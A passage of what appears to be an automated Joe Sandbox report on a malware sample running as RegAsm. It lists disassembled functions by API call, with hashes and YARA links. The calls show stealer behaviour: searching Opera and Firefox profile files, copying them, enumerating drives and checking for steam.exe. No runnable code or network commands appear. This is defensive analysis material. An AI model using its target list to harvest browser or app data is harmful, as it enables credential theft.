                                                                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00415623
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00415637
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$File$Find$Close$AllocCreateFirstHandleLocalNextReadSizelstrcpywsprintf
                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                        • API String ID: 457158367-4073750446
                                                                                                                                                        • Opcode ID: ba4ff2ef4c716514465dcb49d05992b6ad4df85516b6c3a8e407d997ba441363
                                                                                                                                                        • Instruction ID: f5051a0b37ef7b74b5985228d6738895fa30e05d10ed95e979166ef17b5b96f1
                                                                                                                                                        • Opcode Fuzzy Hash: ba4ff2ef4c716514465dcb49d05992b6ad4df85516b6c3a8e407d997ba441363
                                                                                                                                                        • Instruction Fuzzy Hash: EA5141B190021D9BCF64DF60CC89AC9B7BDEB49305F1045E6E609E3250EB369B85CF65
                                                                                                                                                        Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                        • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                        • API String ID: 2567437900-1710495004
                                                                                                                                                        • Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                                                        • Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
                                                                                                                                                        • Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                                                        • Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88
                                                                                                                                                        Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                                                                                                        • _memset.LIBCMT ref: 004151E5
                                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041520E
                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00415229
                                                                                                                                                          • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
                                                                                                                                                          • Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                                                          • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                                                                                                          • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                                                                                                          • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                                                          • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                                                          • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
                                                                                                                                                          • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                                                          • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
                                                                                                                                                          • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                                                                                                          • Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 004152C4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                        • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                        • API String ID: 441469471-147700698
                                                                                                                                                        • Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                                                        • Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
                                                                                                                                                        • Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                                                        • Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59
                                                                                                                                                        Function 00401D80 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 529fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD
                                                                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                          • Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 1116797323-1173974218
                                                                                                                                                        • Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                                                        • Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
                                                                                                                                                        • Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                                                        • Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99
                                                                                                                                                        Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,0043758C,004368AF), ref: 0040D7E8
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040D8B3
                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0040D956
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0040D96A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                        • String ID: prefs.js
                                                                                                                                                        • API String ID: 893096357-3783873740
                                                                                                                                                        • Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                                                        • Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
                                                                                                                                                        • Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                                                        • Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99
                                                                                                                                                        Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040B780
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0040B8FF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3801961486-0
                                                                                                                                                        • Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                                                        • Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
                                                                                                                                                        • Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                                                        • Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9
                                                                                                                                                        Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 004124E4
                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                        • String ID: steam.exe
                                                                                                                                                        • API String ID: 1799959500-2826358650
                                                                                                                                                        • Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                                                        • Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
